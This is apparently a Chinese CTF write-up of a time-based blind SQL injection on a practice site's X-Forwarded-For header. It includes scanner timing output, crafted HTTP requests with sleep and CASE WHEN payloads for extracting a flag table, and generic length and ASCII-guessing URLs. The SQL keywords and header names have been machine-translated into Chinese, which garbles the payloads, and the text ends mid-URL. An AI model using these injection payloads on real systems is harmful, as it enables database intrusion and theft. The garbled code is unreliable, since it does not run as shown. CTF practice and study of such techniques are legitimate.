首先我承认我看了别人怎么做的
因为我并没有什么经验虽然知道回显是由<强> <强> <强>
我看了2个演示选择了最直接的一个也就是使用awvs扫描然后再python扫因为我觉得我并没有手工找注入点的本事先学学利用工具
虽然别人写了用awvs但是开始不管怎么扫描都是扫描不出来,后来. .一个简单的办法原来是这样,附图:
好简单,然后发现了果然是可以注入的好像是基于的时间延迟可惜没系统学习不懂后期补学习内容
给的内容是:
测试执行:
(选择(0)(选择(睡眠(6)))v)/*”+(选择(0)(选择(睡眠(6)))v) + " " +(选择(0)(选择(睡眠(6)))v) +“*/=比;<强> 6.053 s
<李>(选择(0)(选择(睡眠(0)))v)/*”+(选择(0)(选择(睡眠(0)))v) + ' " +(选择(0)(选择(睡眠(0)))v) + " */=比;<强> 0.062 s
<李>(选择(0)(选择(睡眠(3)))v)/*”+(选择(0)(选择(睡眠(3)))v) + ' " +(选择(0)(选择(睡眠(3)))v) + " */=比;<强> 3.042 s
<李>(选择(0)(选择(睡眠(9)))v)/*”+(选择(0)(选择(睡眠(9)))v) + ' " +(选择(0)(选择(睡眠(9)))v) + " */=比;<强> 9.033 s
<李>(选择(0)(选择(睡眠(0)))v)/*”+(选择(0)(选择(睡眠(0)))v) + ' " +(选择(0)(选择(睡眠(0)))v) + " */=比;<强> 0.047 s
<李>(选择(0)(选择(睡眠(0)))v)/*”+(选择(0)(选择(睡眠(0)))v) + ' " +(选择(0)(选择(睡眠(0)))v) + " */=比;<强> 0.047 s
<李>(选择(0)(选择(睡眠(0)))v)/*”+(选择(0)(选择(睡眠(0)))v) + ' " +(选择(0)(选择(睡眠(0)))v) + " */=比;<强> 0.046 s
<李>(选择(0)(选择(睡眠(6)))v)/*”+(选择(0)(选择(睡眠(6)))v) + ' " +(选择(0)(选择(睡眠(6)))v) + " */=比;<强> 6.052 s
<李>(选择(0)(选择(睡眠(0)))v)/*”+(选择(0)(选择(睡眠(0)))v) + ' " +(选择(0)(选择(睡眠(0)))v) + " */=比;<强> 0.063 s
原始值:1 <强>
然后使用http编辑器测试
简化的得到数据为
get/web/wonderkun/http/1.1
X-Forwarded-For: 1 ' +(选择1(选择(睡眠(5)))v) + '
推荐人:http://ctf5.shiyanbar.com/web/wonderkun/index.php
主持人:ctf5.shiyanbar.com
这样就是有效的
反复改变应该在选择(睡眠(5))修改能办到
因为不小心看到演示用了案例语句所以在测试机上使用这样的语句测试了下:
选择案例时(从aaa选择长度(测试)),那么睡眠(2)其他睡眠(0)
结束是有效的。
替换掉得到数据依然有效果
然后想了下实验吧的测试基本上表字段都是旗于是我试一试看行不行好像可以
得到请求为:
get/web/wonderkun/http/1.1
X-Forwarded-For: 1 ' +(选择1(选择情况(选择长度(从国旗国旗))在10,然后睡眠(2)其他睡眠(0)结束)v) + '
推荐人:http://ctf5.shiyanbar.com/web/wonderkun/index.php
主持人:ctf5.shiyanbar.com
然后就是开始判断他的值了不过貌似需要用循环函数去猜解,虽然他给了演示但是还是自己弄一弄
首先我知道了表字段就只需要猜字段数据长度和字段的每一个字母了
首先百度如何猜字段数据长度内容如下:
http://xxx.com/test.asp?id=123(选择1 len (adminname)从管理)在=0
http://xxx.com/test.asp?id=123(选择1 len (adminname)从管理)=7
http://xxx.com/test.asp?id=123(选择1 asc(中期(adminname 1 1))从管理)=97
http://xxx.com/test.asp?id=123(选择1 asc(中期(adminname 2 1))从管理)=78
http://xxx.com/test.asp?id=123(选择1 asc(中期(adminname 3,1))从管理)=96
..........
http://xxx.com/test.asp?null
